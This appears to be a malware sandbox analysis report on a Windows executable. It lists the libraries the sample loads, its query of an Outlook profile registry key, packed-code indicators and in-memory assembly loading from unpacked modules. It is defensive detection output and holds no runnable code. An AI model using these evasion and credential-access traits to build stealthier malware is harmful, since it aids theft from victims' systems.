Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: rasman.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: windowscodecs.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: NXPYoHNSgv.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: NXPYoHNSgv.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: NXPYoHNSgv.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: jBGm.pdb source: NXPYoHNSgv.exe
Source: Binary string: jBGm.pdbSHA256 source: NXPYoHNSgv.exe

Data Obfuscation

Source: NXPYoHNSgv.exe, Form1.cs .Net Code: InitializeComponent contains xor as well as GetObject
Source: 0.2.NXPYoHNSgv.exe.5860000.5.raw.unpack, RZ.cs .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, RVlDSAOxRVyxPMKF9i.cs .Net Code: XmLIBgxePp System.Reflection.Assembly.Load(byte[])
Source: 0.2.NXPYoHNSgv.exe.2e348f4.0.raw.unpack, RZ.cs .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, RVlDSAOxRVyxPMKF9i.cs .Net Code: XmLIBgxePp System.Reflection.Assembly.Load(byte[])
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, RVlDSAOxRVyxPMKF9i.cs .Net Code: XmLIBgxePp System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 0_2_02DDF463 push esp; iretd 0_2_02DDF539
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 0_2_02DDF508 push esp; iretd 0_2_02DDF539
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 0_2_07534E50 pushfd ; retf 0_2_07534E5D
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 0_2_0753754F pushfd ; ret 0_2_0753755F
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_032146F5 pushad ; iretd 5_2_03214705
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC9241 push es; ret 5_2_06FC9244
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC2DC0 pushfd ; retf 5_2_06FC2DC1
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_0719C692 push eax; ret 5_2_0719C699
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_0719CF58 push eax; iretd 5_2_0719CF59
Source: NXPYoHNSgv.exe Static PE information: section name: .text entropy: 7.987793915288752
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, NwjUkYRhiPbBYX4Oni.cs High entropy of concatenated method names: 'Dispose', 'k7fWbFH3tU', 'TLVChmiNFA', 'CNwHHBhxLj', 'sTKWEDA4WR', 'kyhWzeC6jd', 'ProcessDialogKey', 'MCiCQMlxVD', 'tOMCW3J9pV', 'SltCCXZn5Q'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, AMpeOLxWWVXed15Rjv.cs High entropy of concatenated method names: 'ToString', 'GnFo98CTIf', 'D4OohJv35X', 'uBnoev1iYR', 'AA4o4VGt2c', 'eesoFGMfIp', 'znooAqJKNB', 'rVLo5GqGLq', 'Os8ol5utK6', 'X7xoDs7Wpo'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, LUP0OQ4ibQ0iEvSMlh.cs High entropy of concatenated method names: 'TdQjq5py2r', 'T1MjdZAPff', 'cwjjB4j1uP', 'eEUjmVpCVu', 'LMejJSWTp8', 'K6yjaDgKkG', 'DZBjKAPcZ7', 'NcAjpYY9WC', 'txX0Rw35lvPAMqr24r0', 'NyiBH93E93eC8ZXvQFU'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, TYUqd0pPkDFMPFLRHL.cs High entropy of concatenated method names: 'zu7XTICENi', 'gsSXaGY7FX', 'iZpkeOxKos', 'yhok4rZvol', 'c3XkFCArMK', 'McukAFM9U4', 'B20k5y9Cef', 'E7CklAcGJu', 'gcnkDNP8VL', 'z3nkrjZN7v'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, f36uE85AbUbcp2P0xd.cs High entropy of concatenated method names: 'RJeigbUcQD', 'a1cikJwjQq', 'BBMijQI2iF', 'mM3jEcEjZx', 'nDZjzD4ZTF', 'cSSiQbWWZ2', 'PwJiWldnak', 'EhUiC1qERZ', 'hC4i6r77xl', 'MT4iIhoiXV'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, cBr4uhCU8o8Cy8bf2T.cs High entropy of concatenated method names: 'JeBBW5rd2', 'MOymKCdeX', 'zR4Jx94S7', 'pJiaDlK4S', 'TQCKI5NrF', 'Mkdp37s2o', 'IOyRnxIsDk27LLXGn6', 'XU6wGd0pmf26TO5B2D', 'p1yZyAmBr', 'BH7PxsCGs'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, o1d9gStgXVOlEGar3e.cs High entropy of concatenated method names: 'psfjshgaOZ', 'PFYjRg07HF', 'SXyjX4gAoo', 'Gp1jiAN9cL', 'wy4jOtUQd7', 'aEBXyONbN6', 'oCDXVneKMq', 'nyUXNU4Yl0', 'fB3XvmXyoB', 'd94Xbsl0id'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, aRwY22Vs0Gal2sm3Ao.cs High entropy of concatenated method names: 'TPrnvJuTsx', 'op2nEThVt7', 'IYAZQ4tOfN', 'LFjZWHVurs', 'Tphn9oysW6', 'k6rn3UBhJG', 'tKBnMFFRuo', 'P0MnYCptpn', 'DpInH0D0x5', 'KYEnxQIvYY'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, D1Xaa2kb4p1B4Tw15W.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'yAQCb5hS6l', 'KtkCEsYuXR', 'xqhCzuZ1Ql', 'X276QJQ4vB', 'x6L6WxhikG', 'oKs6CL6Pr3', 'vFq665xxKp', 'TlC7eQJB2GuLdeLo0N2'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, NSqt8wWQ2RrVNunr9qC.cs High entropy of concatenated method names: 'nYEUdGWIq0', 'QBbU02dcqB', 'FSaUB5gTCS', 'o3AUm5fhFY', 'JvWUTPN1m9', 'NV5UJGasKL', 'OgcUafgMNi', 'w27USQjrtN', 'ICIUKCCXWb', 'T5gUppjTGq'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, jMlxVDb7OM3J9pVxlt.cs High entropy of concatenated method names: 'c07Zt3UlHb', 's9nZhetuqX', 'vRhZegZWNK', 'FJJZ4Q23r9', 'TpoZYL4AJL', 'yOTZFb1Y6G', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, XGFAS78spoJBcDbmwR.cs High entropy of concatenated method names: 'eUAncETVhn', 'XIqnfpNKR3', 'ToString', 'Ea5ng0KJTp', 'dcFnRNOhKT', 'NYKnkGfEKK', 'SBpnXvHPlm', 'VuLnjZNbLt', 'xSRnicmMpX', 'aDZnOes3Km'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, hZn5QLEbNAmkl46PVu.cs High entropy of concatenated method names: 'Ap5UWwR1DB', 'QDiU6KvI8f', 'Hj2UI0cbvV', 'EZsUgkj0Aj', 'umTURv1YN4', 'xfRUX5PDou', 'd9xUjuh4tY', 'wu4ZN974W5', 'YSAZvNCPUY', 'p7JZb3Jne5'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, BKDA4WvROyheC6jdlC.cs High entropy of concatenated method names: 'f2EZgn1cgf', 'DqGZRHaKAV', 'jSAZkC5g5q', 'zG7ZXPRlIp', 'CRnZj1oYxD', 'W9pZiVZYE8', 'WZvZOG1gB9', 'AbxZwqUr2T', 'MBhZcrKONf', 'MGmZfc7c17'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, EI9VY7W6CndmTPHTju9.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QqNPYCkFgg', 'dalPHWhknr', 'wdxPxvmUnB', 'obxP8dpaip', 'xghPyK1lu7', 'IyFPV1lyh7', 'rfRPNNwl9q'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, IFqjIiKhx4dgIGrjAv.cs High entropy of concatenated method names: 'D2Ykmppgjp', 'Re2kJJW8wl', 'KJVkSBGIi8', 'LNIkKmHFIG', 'tBFkLPAjdt', 'ohkkoDDOsm', 'HDDknhqQLu', 'EJ2kZE83ru', 'cECkUCQTun', 'yCIkPGEYEO'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, yEojYxIQkDkYwMfXZl.cs High entropy of concatenated method names: 'upQWiLPFeb', 'XotWO9WYKQ', 'jhxWc4dgIG', 'NjAWfv8YUq', 'JLRWLHLL1d', 'OgSWogXVOl', 'a2qVSbW86td4nghNCJ', 'DUuROCT55Lrxg3pOmD', 'HqwWWgEo8F', 'CDeW6PfT3T'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, aLPFebSbot9WYKQxSZ.cs High entropy of concatenated method names: 'ECYRYrbR3j', 'FyoRH847w5', 'lAlRx8eKw5', 'aHpR8E7qi1', 'qrFRyCeIST', 'AjORVb66IE', 'fHARNnL469', 'W2NRvKNhvn', 'ei4Rbw51s8', 'CftREyLudR'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, G1Nsw9DieHrvsA5hvT.cs High entropy of concatenated method names: 'wkuidIT7h1', 'ypli0o453a', 'OwfiBg8Cd6', 'F9wimfX4Ie', 'Qc6iTCjfkK', 'KeQiJpt9dl', 'fobiakKxQ2', 'MhOiShl1DS', 'xYLiKf8OsK', 'BQTippNqyK'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, KEObGFMDeIOfWIcUYG.cs High entropy of concatenated method names: 'Q271Sgqyyc', 'OAS1KfimiV', 'kvm1tAQUCy', 'LcZ1hdaoWr', 'TWr14wMVwF', 'L1A1F9iSbS', 'qxd15ilv5j', 'yb31ltvbKN', 'v0n1repiVH', 'ChU19XaMFA'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, RVlDSAOxRVyxPMKF9i.cs High entropy of concatenated method names: 'QVQ6sRo4Qc', 'uP86gZ5IM0', 'Nek6RGR836', 'tRV6kZMrP2', 'uGb6X81rUj', 'Mfp6jsEgaJ', 'nqT6ijfA2J', 'Ajt6ObMokK', 'uwL6w8sKxi', 'w7L6cSV64g'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, NwjUkYRhiPbBYX4Oni.cs High entropy of concatenated method names: 'Dispose', 'k7fWbFH3tU', 'TLVChmiNFA', 'CNwHHBhxLj', 'sTKWEDA4WR', 'kyhWzeC6jd', 'ProcessDialogKey', 'MCiCQMlxVD', 'tOMCW3J9pV', 'SltCCXZn5Q'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, AMpeOLxWWVXed15Rjv.cs High entropy of concatenated method names: 'ToString', 'GnFo98CTIf', 'D4OohJv35X', 'uBnoev1iYR', 'AA4o4VGt2c', 'eesoFGMfIp', 'znooAqJKNB', 'rVLo5GqGLq', 'Os8ol5utK6', 'X7xoDs7Wpo'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, LUP0OQ4ibQ0iEvSMlh.cs High entropy of concatenated method names: 'TdQjq5py2r', 'T1MjdZAPff', 'cwjjB4j1uP', 'eEUjmVpCVu', 'LMejJSWTp8', 'K6yjaDgKkG', 'DZBjKAPcZ7', 'NcAjpYY9WC', 'txX0Rw35lvPAMqr24r0', 'NyiBH93E93eC8ZXvQFU'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, TYUqd0pPkDFMPFLRHL.cs High entropy of concatenated method names: 'zu7XTICENi', 'gsSXaGY7FX', 'iZpkeOxKos', 'yhok4rZvol', 'c3XkFCArMK', 'McukAFM9U4', 'B20k5y9Cef', 'E7CklAcGJu', 'gcnkDNP8VL', 'z3nkrjZN7v'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, f36uE85AbUbcp2P0xd.cs High entropy of concatenated method names: 'RJeigbUcQD', 'a1cikJwjQq', 'BBMijQI2iF', 'mM3jEcEjZx', 'nDZjzD4ZTF', 'cSSiQbWWZ2', 'PwJiWldnak', 'EhUiC1qERZ', 'hC4i6r77xl', 'MT4iIhoiXV'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, cBr4uhCU8o8Cy8bf2T.cs High entropy of concatenated method names: 'JeBBW5rd2', 'MOymKCdeX', 'zR4Jx94S7', 'pJiaDlK4S', 'TQCKI5NrF', 'Mkdp37s2o', 'IOyRnxIsDk27LLXGn6', 'XU6wGd0pmf26TO5B2D', 'p1yZyAmBr', 'BH7PxsCGs'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, o1d9gStgXVOlEGar3e.cs High entropy of concatenated method names: 'psfjshgaOZ', 'PFYjRg07HF', 'SXyjX4gAoo', 'Gp1jiAN9cL', 'wy4jOtUQd7', 'aEBXyONbN6', 'oCDXVneKMq', 'nyUXNU4Yl0', 'fB3XvmXyoB', 'd94Xbsl0id'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, aRwY22Vs0Gal2sm3Ao.cs High entropy of concatenated method names: 'TPrnvJuTsx', 'op2nEThVt7', 'IYAZQ4tOfN', 'LFjZWHVurs', 'Tphn9oysW6', 'k6rn3UBhJG', 'tKBnMFFRuo', 'P0MnYCptpn', 'DpInH0D0x5', 'KYEnxQIvYY'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, D1Xaa2kb4p1B4Tw15W.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'yAQCb5hS6l', 'KtkCEsYuXR', 'xqhCzuZ1Ql', 'X276QJQ4vB', 'x6L6WxhikG', 'oKs6CL6Pr3', 'vFq665xxKp', 'TlC7eQJB2GuLdeLo0N2'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, NSqt8wWQ2RrVNunr9qC.cs High entropy of concatenated method names: 'nYEUdGWIq0', 'QBbU02dcqB', 'FSaUB5gTCS', 'o3AUm5fhFY', 'JvWUTPN1m9', 'NV5UJGasKL', 'OgcUafgMNi', 'w27USQjrtN', 'ICIUKCCXWb', 'T5gUppjTGq'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, jMlxVDb7OM3J9pVxlt.cs High entropy of concatenated method names: 'c07Zt3UlHb', 's9nZhetuqX', 'vRhZegZWNK', 'FJJZ4Q23r9', 'TpoZYL4AJL', 'yOTZFb1Y6G', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, XGFAS78spoJBcDbmwR.cs High entropy of concatenated method names: 'eUAncETVhn', 'XIqnfpNKR3', 'ToString', 'Ea5ng0KJTp', 'dcFnRNOhKT', 'NYKnkGfEKK', 'SBpnXvHPlm', 'VuLnjZNbLt', 'xSRnicmMpX', 'aDZnOes3Km'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, hZn5QLEbNAmkl46PVu.cs High entropy of concatenated method names: 'Ap5UWwR1DB', 'QDiU6KvI8f', 'Hj2UI0cbvV', 'EZsUgkj0Aj', 'umTURv1YN4', 'xfRUX5PDou', 'd9xUjuh4tY', 'wu4ZN974W5', 'YSAZvNCPUY', 'p7JZb3Jne5'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, BKDA4WvROyheC6jdlC.cs High entropy of concatenated method names: 'f2EZgn1cgf', 'DqGZRHaKAV', 'jSAZkC5g5q', 'zG7ZXPRlIp', 'CRnZj1oYxD', 'W9pZiVZYE8', 'WZvZOG1gB9', 'AbxZwqUr2T', 'MBhZcrKONf', 'MGmZfc7c17'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, EI9VY7W6CndmTPHTju9.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QqNPYCkFgg', 'dalPHWhknr', 'wdxPxvmUnB', 'obxP8dpaip', 'xghPyK1lu7', 'IyFPV1lyh7', 'rfRPNNwl9q'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, IFqjIiKhx4dgIGrjAv.cs High entropy of concatenated method names: 'D2Ykmppgjp', 'Re2kJJW8wl', 'KJVkSBGIi8', 'LNIkKmHFIG', 'tBFkLPAjdt', 'ohkkoDDOsm', 'HDDknhqQLu', 'EJ2kZE83ru', 'cECkUCQTun', 'yCIkPGEYEO'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, yEojYxIQkDkYwMfXZl.cs High entropy of concatenated method names: 'upQWiLPFeb', 'XotWO9WYKQ', 'jhxWc4dgIG', 'NjAWfv8YUq', 'JLRWLHLL1d', 'OgSWogXVOl', 'a2qVSbW86td4nghNCJ', 'DUuROCT55Lrxg3pOmD', 'HqwWWgEo8F', 'CDeW6PfT3T'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, aLPFebSbot9WYKQxSZ.cs High entropy of concatenated method names: 'ECYRYrbR3j', 'FyoRH847w5', 'lAlRx8eKw5', 'aHpR8E7qi1', 'qrFRyCeIST', 'AjORVb66IE', 'fHARNnL469', 'W2NRvKNhvn', 'ei4Rbw51s8', 'CftREyLudR'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, G1Nsw9DieHrvsA5hvT.cs High entropy of concatenated method names: 'wkuidIT7h1', 'ypli0o453a', 'OwfiBg8Cd6', 'F9wimfX4Ie', 'Qc6iTCjfkK', 'KeQiJpt9dl', 'fobiakKxQ2', 'MhOiShl1DS', 'xYLiKf8OsK', 'BQTippNqyK'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, KEObGFMDeIOfWIcUYG.cs High entropy of concatenated method names: 'Q271Sgqyyc', 'OAS1KfimiV', 'kvm1tAQUCy', 'LcZ1hdaoWr', 'TWr14wMVwF', 'L1A1F9iSbS', 'qxd15ilv5j', 'yb31ltvbKN', 'v0n1repiVH', 'ChU19XaMFA'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, RVlDSAOxRVyxPMKF9i.cs High entropy of concatenated method names: 'QVQ6sRo4Qc', 'uP86gZ5IM0', 'Nek6RGR836', 'tRV6kZMrP2', 'uGb6X81rUj', 'Mfp6jsEgaJ', 'nqT6ijfA2J', 'Ajt6ObMokK', 'uwL6w8sKxi', 'w7L6cSV64g'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, NwjUkYRhiPbBYX4Oni.cs High entropy of concatenated method names: 'Dispose', 'k7fWbFH3tU', 'TLVChmiNFA', 'CNwHHBhxLj', 'sTKWEDA4WR', 'kyhWzeC6jd', 'ProcessDialogKey', 'MCiCQMlxVD', 'tOMCW3J9pV', 'SltCCXZn5Q'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, AMpeOLxWWVXed15Rjv.cs High entropy of concatenated method names: 'ToString', 'GnFo98CTIf', 'D4OohJv35X', 'uBnoev1iYR', 'AA4o4VGt2c', 'eesoFGMfIp', 'znooAqJKNB', 'rVLo5GqGLq', 'Os8ol5utK6', 'X7xoDs7Wpo'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, LUP0OQ4ibQ0iEvSMlh.cs High entropy of concatenated method names: 'TdQjq5py2r', 'T1MjdZAPff', 'cwjjB4j1uP', 'eEUjmVpCVu', 'LMejJSWTp8', 'K6yjaDgKkG', 'DZBjKAPcZ7', 'NcAjpYY9WC', 'txX0Rw35lvPAMqr24r0', 'NyiBH93E93eC8ZXvQFU'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, TYUqd0pPkDFMPFLRHL.cs High entropy of concatenated method names: 'zu7XTICENi', 'gsSXaGY7FX', 'iZpkeOxKos', 'yhok4rZvol', 'c3XkFCArMK', 'McukAFM9U4', 'B20k5y9Cef', 'E7CklAcGJu', 'gcnkDNP8VL', 'z3nkrjZN7v'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, f36uE85AbUbcp2P0xd.cs High entropy of concatenated method names: 'RJeigbUcQD', 'a1cikJwjQq', 'BBMijQI2iF', 'mM3jEcEjZx', 'nDZjzD4ZTF', 'cSSiQbWWZ2', 'PwJiWldnak', 'EhUiC1qERZ', 'hC4i6r77xl', 'MT4iIhoiXV'
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, cBr4uhCU8o8Cy8bf2T.cs High entropy of concatenated method names: 'JeBBW5rd2', 'MOymKCdeX', 'zR4Jx94S7', 'pJiaDlK4S', 'TQCKI5NrF', 'Mkdp37s2o', 'IOyRnxIsDk27LLXGn6', 'XU6wGd0pmf26TO5B2D', 'p1yZyAmBr', 'BH7PxsCGs'
